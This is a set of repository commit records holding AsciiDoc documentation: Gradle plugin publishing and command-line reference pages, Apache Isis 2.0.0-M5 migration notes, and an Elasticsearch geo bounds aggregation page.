`gradlePlugin {}` block), named `<pluginName>PluginMarkerMaven` (for example in the above example it would be `simplePluginPluginMarkerMaven`)\n\nThis automatic configuration happens in a link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:afterEvaluate(org.gradle.api.Action)[Project.afterEvaluate()] block (so at the end of the <<build_lifecycle.adoc#sec:build_phases,build configuration phase>>), and only if these publications haven't already been defined, so it's possible to create and customise them during the earlier stages of build configuration.\n\n=== Ivy Publish Plugin\n\nWhen the Java Gradle Plugin(`java-gradle-plugin`) detects that the Ivy Publish Plugin (`ivy-publish`) is also applied by the build, it will automatically configure the following link:{groovyDslPath}\/org.gradle.api.publish.ivy.IvyPublication.html[IvyPublications]:\n\n* a single \"main\" publication, named `pluginIvy`, based on the <<java_plugin.adoc#sec:java_plugin_publishing,main Java component>>\n* multiple <<plugins.adoc#sec:plugin_markers,\"marker\" publications>> (one for each plugin defined in the `gradlePlugin {}` block), named `<pluginName>PluginMarkerIvy` (for example in the above example it would be `simplePluginPluginMarkerIvy`)\n\nThis automatic configuration 
happens in a link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:afterEvaluate(org.gradle.api.Action)[Project.afterEvaluate()] block (so at the end of the <<build_lifecycle.adoc#sec:build_phases,build configuration phase>>), and only if these publications haven't already been defined, so it's possible to create and customise them during the earlier stages of build configuration.\n\n=== Plugin Publish Plugin\n\nStarting from link:https:\/\/plugins.gradle.org\/plugin\/com.gradle.plugin-publish\/1.0.0[version 1.0.0, the Plugin Publish Plugin] always auto-applies the Java Gradle Plugin (`java-gradle-plugin`) and the Maven Publish Plugin (`maven-publish`).","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7dafa5436cba15e4f4350dd685d175d088f4ad0e","subject":"ISIS-2484: add migration notes on auto-create schema","message":"ISIS-2484: add migration notes on auto-create schema","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"antora\/components\/relnotes\/modules\/ROOT\/pages\/2020\/2.0.0-M5\/mignotes.adoc","new_file":"antora\/components\/relnotes\/modules\/ROOT\/pages\/2020\/2.0.0-M5\/mignotes.adoc","new_contents":"= Migrating from M4 to M5\n\n:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at. http:\/\/www.apache.org\/licenses\/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n:page-partial:\n\nWARNING: Not released yet.\n\n== Removal of Image Value Type\n\nSome Java classes and\/or packages have been renamed\/moved:\n\n[source,java]\n.Applib\n----\n\/\/ org.apache.isis.applib.value.Image\norg.apache.isis.legacy.applib.value.Image \/\/ <.>\n----\n<.> only kept to ease migration, use `java.awt.image.BufferedImage` instead, which is supported by the framework as value type\n\n\n== Removal of deprecated Contributees\n\n.Config\n[source,java]\n----\nisis.core.metaModel.validator.serviceActionsOnly=true \/\/ <.>\nisis.core.metaModel.validator.mixins-only=true \/\/ <.>\n----\n<.> `@DomainService(natureOfService=VIEW\/REST)` is now solely used for UI menu action providers and REST end-points.\nThere is no longer the need to validate uses of `natureOfService=DOMAIN` as this option was removed.\n<.> Support for services that contribute members to other `DomainObjects` was removed. Use `Mixins` instead.\n\nSee the former java-doc for hints on how to migrate the previous options.\n\n.@DomainService(natureOfService=...)\n[source,java]\n----\n\/**\n * A <em>programmatic<\/em> service.\n * <p>\n * The service's actions do not appear on any viewer and are not visible in the REST API. In other words\n * these are not contributed to the domain-model. However, the service is injectable into domain objects.\n * <\/p>\n *\n * @deprecated will be removed with 2.0.0 release! 
use Spring's {@link org.springframework.stereotype.Service @Service} instead;\n * @apiNote For now, used as synonym for {@link #REST}\n *\/\n@Deprecated\nDOMAIN,\n\n\/**\n * @deprecated will be removed with 2.0.0 release! use {@link #REST} instead;\n * @apiNote For now, used as synonym for {@link #REST}\n *\/\n@Deprecated\nVIEW_REST_ONLY,\n\n\/**\n * @deprecated will be removed with 2.0.0 release! use {@link #VIEW} instead\n * @apiNote For now, used as synonym for {@link #VIEW}\n *\/\n@Deprecated\nVIEW_MENU_ONLY,\n\n\/**\n * @deprecated will be removed with 2.0.0 release!\n * <p>\n * For now, contributing actions will be gathered to show up in the 'others' menu to ease migration.\n * These will likely not work.\n * <p>\n * Migration Note: For each {@code Action} write a new mixin class.\n * see {@link Mixin}\n * @apiNote For now, used as synonym for {@link #VIEW}\n *\/\n@Deprecated\nVIEW_CONTRIBUTIONS_ONLY,\n----\n\n== Changes to the Configuration\n\n[cols=\"2a,3a\", options=\"header\"]\n.as mapped to IsisConfiguration\n|===\n\n| was\n| new\n\n| isis.persistence.jdo-datanucleus.impl\n| removed, instead configure datasources the Spring way (eg. by providing a DataSource factory) or properties like:\n[source]\n----\nspring.datasource.platform=h2\nspring.datasource.url=jdbc:h2:mem:...\n----\nconfigure Datanucleus settings using\n[source]\n----\ndatanucleus. ...\njavax.jdo. ...\n----\n\n| isis.core.runtimeservices.exception-recognizer.jdo\n| isis.core.runtimeservices.exception-recognizer.dae\n\n|===\n\nThe framework functionality that inspected the JDO meta-model for schemas and auto-created them was removed. This responsibility is now delegated to Spring.\nHowever, as a fallback we introduced configuration options that allow explicit schema creation by the framework, for both JDO and JPA: \n\n[source,yaml]\n.application.yml\n----\nisis:\n persistence:\n schema:\n auto-create-schemas: hello\n create-schema-sql-template: \"CREATE SCHEMA IF NOT EXISTS %S\"\n----\n\nMore details on the various configuration options can be found in the _Javadoc_ of _IsisConfiguration_.\n\n== Changes to the Programming Model\n\n=== Removed (Programming Model)\n\n[cols=\"2a,3a\", options=\"header\"]\n\n|===\n\n| was\n| now what?\n\n| `@ActionLayout(contributed=...)`\n| was only effective on mixin methods; use `@Action`, `@Property` or `@Collection` instead\n\n| `@Action\/@Property(command=...)`\n| replaced with `commandPublishing`\n\n| `@Action\/@Property(publish=...)`\n| replaced with `executionPublishing`\n\n| `@DomainObject(audit=...)`\n| replaced with `entityChangePublishing`\n\n| `@DomainObject(nature=...)`\n\n* `EXTERNAL_ENTITY`\n* `INMEMORY_ENTITY`\n| use `@DomainObject(nature=VIEW_MODEL)` instead\n\n| `@DomainObject(nature=...)`\n\n* `JDO_ENTITY`\n* `JPA_ENTITY`\n| use `@DomainObject(nature=ENTITY)` instead\n\n| `@DomainObject(publish=...)`\n| replaced with `entityChangePublishing`\n\n| `@DomainService(repositoryFor=...)`\n| if this domain service acts as a repository for an entity type,\nspecify that entity type (was never implemented)\n\n| `@Mixin`\n| use `@Action`, `@Property` or `@Collection` instead;\n\nfor more fine-grained control (eg.\n
setting the mixin's method name)\nuse `@DomainObject(nature=MIXIN, ...)` combined with one of the above\n\n| `@ViewModel`\n| use `@DomainObject(nature=VIEW_MODEL)` instead\n\n| `@ViewModelLayout`\n| use `@DomainObjectLayout` instead\n\n|===\n\n\n=== Added (Programming Model)\n\n.Command\/Execution Publishing (Member Level Annotations)\n[source,java]\n----\n@Action\/@Property(commandPublishing=ENABLED\/DISABLED) \/\/ <.>\n@Action\/@Property(executionPublishing=ENABLED\/DISABLED) \/\/ <.>\n----\n<.> affects Command publishing\n<.> affects Execution publishing\n\n.Entity Change Publishing (Class Level Annotations)\n[source,java]\n----\n@DomainObject(entityChangePublishing=ENABLED\/DISABLED) \/\/ <.>\n----\n<.> affects EntityChange publishing (effective only for entity types)\n\n=== Renamed (Programming Model)\n\n.Publishing API\/SPI\n[source,java]\n----\nAuditerService -> EntityPropertyChangeSubscriber \/\/ <.>\nPublisherService -> ExecutionSubscriber & EntityChangesSubscriber \/\/ <.>\nCommandServiceListener -> CommandSubscriber\n\nPublishedObjects -> ChangingEntities\n----\n<.> `EntityPropertyChangeSubscriber` receives pre-post property values for each changed entity\n<.> `EntityChangesSubscriber` receives the entire set of changed entities, serializable as `ChangesDto`\n\n\n.Loggers - each to be activated by enabling debug logging for the corresponding Logger class\n[source,java]\n----\nAuditerServiceLogging -> EntityPropertyChangeLogger\nPublisherServiceLogging -> ExecutionLogger & EntityChangesLogger\nCommandLogger (NEW)\n----\n\n.Internal Services\n[source,java]\n----\nAuditerDispatchService -> EntityPropertyChangePublisher\nPublisherDispatchService -> ExecutionPublisher & EntityChangesPublisher\nPublisherDispatchServiceDefault -> ExecutionPublisherDefault & EntityChangesPublisherDefault\nCommandServiceInternal -> CommandPublisher\n----\n\n== Changes to Applib and Services\n\n* Interaction related classes have been moved to module `core\/interaction`.\n* Transaction related classes have been moved to module `core\/transaction`.\n* JDO classes have been split up into several modules under `persistence\/jdo\/`.\n* Multiple `Exception` classes have been relocated at `org.apache.isis.applib.exceptions`\n\n[cols=\"3m,3m\", options=\"header\"]\n\n|===\n\n| was\n| new\n\n| ApplicationException (removed)\n| removed, adds no new semantics compared to the already existing RecoverableException\n\n| AuthenticationSession\n| Authentication (no longer holds MessageBroker or session attributes, is now immutable)\n\n| AuthenticationSessionStrategy\n| AuthenticationStrategy\n\n| AuthenticationSessionStrategyBasicAuth.footnote:[These might be in use with configuration files, check yours!]\n| AuthenticationStrategyBasicAuth\n\n| AuthenticationSessionStrategyDefault.footnote:[These might be in use with configuration files, check yours!]\n| AuthenticationStrategyDefault\n\n| AuthenticationSessionTracker#getInteraction : Interaction\n| AuthenticationContext#currentInteraction : *Optional*<Interaction>\n\n| Clock (moved from applib module to fixture-applib module)\n| VirtualClock (introduced)\n\n| FatalException (removed)\n| removed, adds no new semantics compared to the already existing UnrecoverableException\n\n| HoldsUpdatedBy, HoldsUpdatedAt, Timestampable\n| moved to 'commons' and renamed:\n HasUpdatedBy,\n HasUpdatedAt,\n HasUpdatedByAndAt\n\n| IsisInteractionFactory\n| InteractionFactory\n\n| IsisModuleJdoDataNucleus5\n| removed, use IsisModuleJdoDatanucleus instead (symmetry with 
\n\n.Internal Services\n[source,java]\n----\nAuditerDispatchService -> EntityPropertyChangePublisher\nPublisherDispatchService -> ExecutionPublisher & EntityChangesPublisher\nPublisherDispatchServiceDefault -> ExecutionPublisherDefault & EntityChangesPublisherDefault\nCommandServiceInternal -> CommandPublisher\n----\n\n== Changes to Applib and Services\n\n* Interaction related classes have been moved to module `core\/interaction`.\n* Transaction related classes have been moved to module `core\/transaction`.\n* JDO classes have been split up into several modules under `persistence\/jdo\/`.\n* Multiple `Exception` classes have been relocated to `org.apache.isis.applib.exceptions`.\n\n[cols=\"3m,3m\", options=\"header\"]\n\n|===\n\n| was\n| new\n\n| ApplicationException (removed)\n| removed, adds no new semantics compared to the already existing RecoverableException\n\n| AuthenticationSession\n| Authentication (no longer holds MessageBroker or session attributes, is now immutable)\n\n| AuthenticationSessionStrategy\n| AuthenticationStrategy\n\n| AuthenticationSessionStrategyBasicAuth.footnote:[These might be in use with configuration files, check yours!]\n| AuthenticationStrategyBasicAuth\n\n| AuthenticationSessionStrategyDefault.footnote:[These might be in use with configuration files, check yours!]\n| AuthenticationStrategyDefault\n\n| AuthenticationSessionTracker#getInteraction : Interaction\n| AuthenticationContext#currentInteraction : *Optional*<Interaction>\n\n| Clock (moved from applib module to fixture-applib module)\n| VirtualClock (introduced)\n\n| FatalException (removed)\n| removed, adds no new semantics compared to the already existing UnrecoverableException\n\n| HoldsUpdatedBy, HoldsUpdatedAt, Timestampable\n| moved to 'commons' and renamed:\n HasUpdatedBy,\n HasUpdatedAt,\n HasUpdatedByAndAt\n\n| IsisInteractionFactory\n| InteractionFactory\n\n| IsisModuleJdoDataNucleus5\n| removed, use IsisModuleJdoDatanucleus instead (symmetry with JPA\/IsisModuleJpaEclipselink)\n\n| IsisJdoSupport, IsisJdoSupport_v3_2\n| removed, use JdoSupportService instead (symmetry with JPA\/JpaSupportService)\n\n| InteractionClosure\n| AuthenticationLayer\n\n| IsisApplicationException\n| ApplicationException\n\n| IsisException (removed)\n| use one of 2 hierarchies (in support of i18n translation)\n\n- RecoverableException\n\n- UnrecoverableException\n\n| IsisInteractionTracker\n| InteractionTracker\n\n| MessageBroker is held by Authentication(Session)\n| MessageBroker is held by InteractionSession\n\n| NonRecoverableException\n| renamed to UnrecoverableException\n\n| ParentedOid, PojoRecreationException, PojoRefreshException\n| removed, as no longer used\n\n| QueryDefault (removed)\n|\n[line-through]#new QueryDefault<>(CommandJdo.class, \"findByParent\",\n \"parent\", parent));#\n\nQuery.named(CommandJdo.class, \"findByParent\") +\n .withParameter(\"parent\", parent));\n\n| SudoService\n| redefined, see java doc for details\n\n| TestClock (removed)\n| use the factories of VirtualClock instead, eg. VirtualClock.frozenTestClock()\n\n| Transaction (removed)\n| no replacement (use TransactionService to get current tx id)\n\n| TransactionScopeListener (removed)\n| use Spring's TransactionSynchronization instead\n\n| TransactionService\n| improved API provides more fine grained control\n\n| UserService#getUser() : UserMemento\n| UserService#currentUser() : *Optional*<UserMemento>\n\n|===\n\n\n== Deprecations\n\n.RepositoryService\n[source,java]\n----\n<T> T detachedEntity(Class<T> ofType); \/\/ <.>\n----\n<.> if applicable use `<T> T detachedEntity(T entity)` instead ... \"new is the new new\": passing\nin a new-ed up (entity) instance is more flexible and also less error prone, eg. it allows the compiler to check the\nvalidity of the used constructor rather than doing construction reflectively at runtime
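\n\nA minimal before\/after sketch (the `Customer` type and its constructor are hypothetical):\n\n[source,java]\n----\n\/\/ before (deprecated): type-based, the instance is constructed reflectively at runtime\nCustomer customer = repositoryService.detachedEntity(Customer.class);\n\n\/\/ after: pass in a new-ed up instance; the constructor call is checked by the compiler\nCustomer customer = repositoryService.detachedEntity(new Customer(\"Alice\"));\n----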
\n\n== Extensions\n\nObject type namespaces have been renamed.\n\nWARNING: check menubars.layout.xml for any occurrences\n\n[cols=\"3m,3m\", options=\"header\"]\n|===\n\n| Old\n| New\n\n| isisApplib\n| isis.applib\n\n| isisMetaModel\n| isis.metamodel\n\n| isisSecurityApi\n| isis.security\n\n| isissecurity\n| isis.ext.secman\n\n| isisExt*\n| isis.ext.*\n\n| isisSub*\n| isis.sub.*\n\n|===\n\n\n=== SecMan (Extension)\n\nPermissions are now matched against logical packages, logical object types or logical object member names, and use the former fully qualified names only as a fallback.\n\n[cols=\"3m,3m,3a\", options=\"header\"]\n|===\n\n| What\n| Old\n| New\n\n| Domain Object namespaces in SecMan scope like eg. objectType = \"isissecurity.ApplicationUser\"\n| isissecurity\n| isis.ext.secman\n\nWARNING: check menubars.layout.xml for any occurrences\n\n| Default Regular User Role Name\n| isis-module-security-regular-user\n| secman-regular-user\n\n| Default Fixture Role Name\n| isis-module-security-fixtures\n| secman-fixtures\n\n| Default Admin Role Name\n| isis-module-security-admin\n| secman-admin\n\n| Default Admin User Name\n| isis-module-security-admin\n| secman-admin\n\n| Class\n| SecurityModuleConfig\n| SecmanConfiguration\n\n| Option\n| SecurityModuleConfig#adminAdditionalPackagePermission\n| SecmanConfiguration#adminAdditionalNamespacePermission\n\n\n\n|===\n\n","old_contents":"","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ebf39fb4e8639d1e488872978056fa5cc18fbf7","subject":"Docs: Fix missing comma and boolean true","message":"Docs: Fix missing comma and boolean true\n\nCloses #9350\n","repos":"fubuki\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch","old_file":"docs\/reference\/search\/aggregations\/metrics\/geobounds-aggregation.asciidoc","new_file":"docs\/reference\/search\/aggregations\/metrics\/geobounds-aggregation.asciidoc","new_contents":"[[search-aggregations-metrics-geobounds-aggregation]]\n=== Geo Bounds Aggregation\n\nA metric aggregation that computes the bounding box containing all geo_point values for a field.\n\n.Experimental!\n[IMPORTANT]\n=====\nThis feature is marked as experimental, and may be subject to change in the\nfuture. If you use this feature, please let us know your experience with it!\n=====\n\nExample:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {\n \"match\" : { \"business_type\" : \"shop\" }\n },\n \"aggs\" : {\n \"viewport\" : {\n \"geo_bounds\" : {\n \"field\" : \"location\", <1>\n \"wrap_longitude\" : true <2>\n }\n }\n }\n}\n--------------------------------------------------\n\n<1> The `geo_bounds` aggregation specifies the field to use to obtain the bounds\n<2> `wrap_longitude` is an optional parameter which specifies whether the bounding box should be allowed to overlap the international date line. The default value is `true`.
\n\nThe above aggregation demonstrates how one would compute the bounding box of the location field for all documents with a business type of shop.\n\nThe response for the above aggregation:\n\n[source,js]\n--------------------------------------------------\n{\n ...\n\n \"aggregations\": {\n \"viewport\": {\n \"bounds\": {\n \"top_left\": {\n \"lat\": 80.45,\n \"lon\": -160.22\n },\n \"bottom_right\": {\n \"lat\": 40.65,\n \"lon\": 42.57\n }\n }\n }\n }\n}\n--------------------------------------------------\n","old_contents":"","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"603f1b46bfdf6855a14cec0672a0831a1e2eb3cb","subject":"Fix docs link","message":"Fix docs link\n","repos":"gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/reference\/command_line_interface.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/reference\/command_line_interface.adoc","new_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[command_line_interface]]\n= Command-Line Interface\n\n[.lead]\nThe command-line interface is one of the primary methods of interacting with Gradle.
The following serves as a reference for executing and customizing Gradle from the command line, and for writing scripts or configuring continuous integration.\n\nUse of the <<gradle_wrapper.adoc#gradle_wrapper, Gradle Wrapper>> is highly encouraged. You should substitute `.\/gradlew` or `gradlew.bat` for `gradle` in all following examples when using the Wrapper.\n\nExecuting Gradle on the command-line conforms to the following structure. Options are allowed before and after task names.\n----\ngradle [taskName...] [--option-name...]\n----\n\nIf multiple tasks are specified, they should be separated with a space.\n\nOptions that accept values can be specified with or without `=` between the option and argument; however, use of `=` is recommended.\n----\n--console=plain\n----\n\nOptions that enable behavior have long-form options with inverses specified with `--no-`. The following are opposites.\n----\n--build-cache\n--no-build-cache\n----\n\nMany long-form options have short-option equivalents. The following are equivalent:\n----\n--help\n-h\n----\n\n[NOTE]\n====\nMany command-line flags can be specified in `gradle.properties` to avoid needing to be typed. See the <<build_environment.adoc#sec:gradle_configuration_properties, configuring build environment guide>> for details.\n====\n\nThe following sections describe use of the Gradle command-line interface, grouped roughly by user goal. Some plugins also add their own command line options, for example <<java_testing.adoc#test_filtering,`--tests` for Java test filtering>>. For more information on exposing command line options for your own tasks, see <<custom_tasks.adoc#sec:declaring_and_using_command_line_options,Declaring and using command-line options>>.\n\n[[sec:command_line_executing_tasks]]\n== Executing tasks\n\nYou can run a task and all of its <<tutorial_using_tasks.adoc#sec:task_dependencies,dependencies>>.\n----\n$ gradle myTask\n----\n\nYou can learn about what projects and tasks are available in the <<#sec:command_line_project_reporting, project reporting section>>.\n\nMost builds support a common set of tasks known as <<more_about_tasks#sec:lifecycle_tasks,_lifecycle tasks_>>. These include the `build`, `assemble`, and `check` tasks.\n\n[[executing_tasks_in_multi_project_builds]]\n=== Executing tasks in multi-project builds\nIn a <<intro_multi_project_builds.adoc#intro_multi_project_builds, multi-project build>>, subproject tasks can be executed with \":\" separating subproject name and task name. The following are equivalent _when run from the root project_.\n\n----\n$ gradle :my-subproject:taskName\n$ gradle my-subproject:taskName\n----\n\nYou can also run a task for all subprojects using the task name only. For example, this will run the \"test\" task for all subprojects when invoked from the root project directory.\n\n----\n$ gradle test\n----\n\nWhen invoking Gradle from within a subproject, the project name should be omitted:\n\n----\n$ cd my-subproject\n$ gradle taskName\n----\n\n[NOTE]\n====\nWhen executing the Gradle Wrapper from subprojects, one must reference `gradlew` relatively. For example: `..\/gradlew taskName`. The community http:\/\/www.gdub.rocks\/[gdub project] aims to make this more convenient.\n====\n\n=== Executing multiple tasks\nYou can also specify multiple tasks.
For example, the following will execute the `test` and `deploy` tasks in the order that they are listed on the command-line and will also execute the dependencies for each task.\n\n----\n$ gradle test deploy\n----\n\n[[sec:excluding_tasks_from_the_command_line]]\n=== Excluding tasks from execution\nYou can exclude a task from being executed using the `-x` or `--exclude-task` command-line option and providing the name of the task to exclude.\n\n.Simple Task Graph\nimage::commandLineTutorialTasks.png[]\n\n.Excluding tasks\n----\n$ gradle dist --exclude-task test\ninclude::{snippetsPath}\/tutorial\/excludeTasks\/tests\/excludeTask.out[]\n----\n\nYou can see that the `test` task is not executed, even though it is a dependency of the `dist` task. The `test` task's dependencies such as `compileTest` are not executed either. Those dependencies of `test` that are required by another task, such as `compile`, are still executed.\n\n[[sec:rerun_tasks]]\n=== Forcing tasks to execute\n\nYou can force Gradle to execute all tasks ignoring <<more_about_tasks.adoc#sec:up_to_date_checks,up-to-date checks>> using the `--rerun-tasks` option:\n\n----\n$ gradle test --rerun-tasks\n----\n\nThis will force `test` and _all_ task dependencies of `test` to execute. It's a little like running `gradle clean test`, but without the build's generated output being deleted.\n\n[[sec:continue_build_on_failure]]\n=== Continuing the build when a failure occurs\n\nBy default, Gradle will abort execution and fail the build as soon as any task fails. This allows the build to complete sooner, but hides other failures that would have occurred. In order to discover as many failures as possible in a single build execution, you can use the `--continue` option.\n\n----\n$ gradle test --continue\n----\n\nWhen executed with `--continue`, Gradle will execute _every_ task to be executed where all of the dependencies for that task completed without failure, instead of stopping as soon as the first failure is encountered. Each of the encountered failures will be reported at the end of the build.\n\nIf a task fails, any subsequent tasks that were depending on it will not be executed. For example, tests will not run if there is a compilation failure in the code under test; because the test task will depend on the compilation task (either directly or indirectly).\n\n[[sec:name_abbreviation]]\n=== Name abbreviation\n\nWhen you specify tasks on the command-line, you don\u2019t have to provide the full name of the task. You only need to provide enough of the task name to uniquely identify the task. For example, it's likely `gradle che` is enough for Gradle to identify the `check` task.\n\nThe same applies for project names. You can execute the `check` task in the `library` subproject with the `gradle lib:che` command.\n\nYou can use https:\/\/en.wikipedia.org\/wiki\/Camel_case[camel case] patterns for more complex abbreviations. These patterns are expanded to match camel case and https:\/\/en.wikipedia.org\/wiki\/Kebab_case[kebab case] names. 
For example the pattern `foBa` (or even `fB`) matches `fooBar` and `foo-bar`.\n\nMore concretely, you can run the `compileTest` task in the `my-awesome-library` subproject with the `gradle mAL:cT` command.\n\n.Abbreviated project and task names\n----\n$ gradle mAL:cT\ninclude::{snippetsPath}\/tutorial\/nameMatching\/tests\/nameMatching.out[]\n----\n\nYou can also use these abbreviations with the -x command-line option.\n\n== Common tasks\n\nThe following are task conventions applied by built-in and most major Gradle plugins.\n\n=== Computing all outputs\n\nIt is common in Gradle builds for the `build` task to designate assembling all outputs and running all checks.\n\n----\n$ gradle build\n----\n\n=== Running applications\n\nIt is common for applications to be run with the `run` task, which assembles the application and executes some script or binary.\n\n----\n$ gradle run\n----\n\n=== Running all checks\n\nIt is common for _all_ verification tasks, including tests and linting, to be executed using the `check` task.\n\n----\n$ gradle check\n----\n\n=== Cleaning outputs\n\nYou can delete the contents of the build directory using the `clean` task, though doing so will cause pre-computed outputs to be lost, causing significant additional build time for the subsequent task execution.\n\n----\n$ gradle clean\n----\n\n[[sec:command_line_project_reporting]]\n== Project reporting\n\nGradle provides several built-in tasks which show particular details of your build. This can be useful for understanding the structure and dependencies of your build, and for debugging problems.\n\nYou can get basic help about available reporting options using `gradle help`.\n\n=== Listing projects\n\nRunning `gradle projects` gives you a list of the sub-projects of the selected project, displayed in a hierarchy.\n\n----\n$ gradle projects\n----\n\nYou also get a project report within build scans. Learn more about https:\/\/guides.gradle.org\/creating-build-scans\/[creating build scans].\n\n[[sec:listing_tasks]]\n=== Listing tasks\n\nRunning `gradle tasks` gives you a list of the main tasks of the selected project. This report shows the default tasks for the project, if any, and a description for each task.\n\n----\n$ gradle tasks\n----\n\nBy default, this report shows only those tasks which have been assigned to a task group. 
You can obtain more information in the task listing using the `--all` option.\n\n----\n$ gradle tasks --all\n----\n\nIf you need to be more precise, you can display only the tasks from a specific group using the `--group` option.\n\n----\n$ gradle tasks --group=\"build setup\"\n----\n\n[[sec:show_task_details]]\n=== Show task usage details\n\nRunning `gradle help --task someTask` gives you detailed information about a specific task.\n\n.Obtaining detailed help for tasks\n----\n$ gradle -q help --task libs\ninclude::{snippetsPath}\/tutorial\/projectReports\/tests\/taskHelp.out[]\n----\n\nThis information includes the full task path, the task type, possible command line options and the description of the given task.\n\n=== Reporting dependencies\n\nBuild scans give a full, visual report of what dependencies exist on which configurations, transitive dependencies, and dependency version selection.\n\n----\n$ gradle myTask --scan\n----\n\nThis will give you a link to a web-based report, where you can find dependency information like this.\n\nimage::gradle-core-test-build-scan-dependencies.png[Build Scan dependencies report]\n\nLearn more in <<viewing_debugging_dependencies.adoc#,Viewing and debugging dependencies>>.\n\n=== Listing project dependencies\n\nRunning `gradle dependencies` gives you a list of the dependencies of the selected project, broken down by configuration. For each configuration, the direct and transitive dependencies of that configuration are shown in a tree. Below is an example of this report:\n\n----\n$ gradle dependencies\n----\n\nConcrete examples of build scripts and output are available in <<viewing_debugging_dependencies.adoc#,Viewing and debugging dependencies>>.\n\nRunning `gradle buildEnvironment` visualizes the buildscript dependencies of the selected project, similarly to how `gradle dependencies` visualizes the dependencies of the software being built.\n\n----\n$ gradle buildEnvironment\n----\n\nRunning `gradle dependencyInsight` gives you an insight into a particular dependency (or dependencies) that match specified input.\n\n----\n$ gradle dependencyInsight\n----\n\nSince a dependency report can get large, it can be useful to restrict the report to a particular configuration. This is achieved with the optional `--configuration` parameter.
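\n\nFor example, a sketch (the dependency and configuration names here are illustrative; `--dependency` selects the dependency to inspect):\n\n----\n$ gradle dependencyInsight --dependency slf4j-api --configuration compileClasspath\n----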
\n\n[[sec:listing_properties]]\n=== Listing project properties\n\nRunning `gradle properties` gives you a list of the properties of the selected project.\n\n.Information about properties\n----\n$ gradle -q api:properties\ninclude::{snippetsPath}\/tutorial\/projectReports\/tests\/propertyListReport.out[]\n----\n\n=== Software Model reports\n\nYou can get a hierarchical view of elements for <<software_model.adoc#software_model,software model>> projects using the `model` task:\n\n----\n$ gradle model\n----\n\nLearn more about <<software_model.adoc#model-report,the model report>> in the software model documentation.\n\n\n[[sec:command_line_completion]]\n== Command-line completion\n\nGradle provides bash and zsh tab completion support for tasks, options, and Gradle properties through https:\/\/github.com\/gradle\/gradle-completion[gradle-completion], installed separately.\n\n.Gradle Completion\nimage::gradle-completion-4.0.gif[]\n\n[[sec:command_line_debugging]]\n== Debugging options\n\n`-?`, `-h`, `--help`::\nShows a help message with all available CLI options.\n\n`-v`, `--version`::\nPrints Gradle, Groovy, Ant, JVM, and operating system version information.\n\n`-S`, `--full-stacktrace`::\nPrint out the full (very verbose) stacktrace for any exceptions. See also <<#sec:command_line_logging, logging options>>.\n\n`-s`, `--stacktrace`::\nPrint out the stacktrace also for user exceptions (e.g. compile error). See also <<#sec:command_line_logging, logging options>>.\n\n`--scan`::\nCreate a https:\/\/gradle.com\/build-scans[build scan] with fine-grained information about all aspects of your Gradle build.\n\n`-Dorg.gradle.debug=true`::\nDebug Gradle client (non-Daemon) process. Gradle will wait for you to attach a debugger at `localhost:5005` by default.\n\n`-Dorg.gradle.daemon.debug=true`::\nDebug <<gradle_daemon.adoc#gradle_daemon, Gradle Daemon>> process.\n\n[[sec:command_line_performance]]\n== Performance options\nTry these options when optimizing build performance. Learn more about https:\/\/guides.gradle.org\/performance\/[improving performance of Gradle builds here].\n\nMany of these options can be specified in `gradle.properties` so command-line flags are not necessary. See the <<build_environment.adoc#sec:gradle_configuration_properties, configuring build environment guide>>.\n\n`--build-cache`, `--no-build-cache`::\nToggles the <<build_cache.adoc#build_cache, Gradle build cache>>. Gradle will try to reuse outputs from previous builds. _Default is off_.\n\n`--configure-on-demand`, `--no-configure-on-demand`::\nToggles <<multi_project_builds.adoc#sec:configuration_on_demand, Configure-on-demand>>. Only relevant projects are configured in this build run. _Default is off_.\n\n`--max-workers`::\nSets maximum number of workers that Gradle may use. _Default is number of processors_.\n\n`--parallel`, `--no-parallel`::\nBuild projects in parallel. For limitations of this option, see <<multi_project_builds.adoc#sec:parallel_execution, Parallel Project Execution>>. _Default is off_.\n\n`--priority`::\nSpecifies the scheduling priority for the Gradle daemon and all processes launched by it. Values are `normal` or `low`. _Default is normal_.\n\n`--profile`::\nGenerates a high-level performance report in the `$buildDir\/reports\/profile` directory.
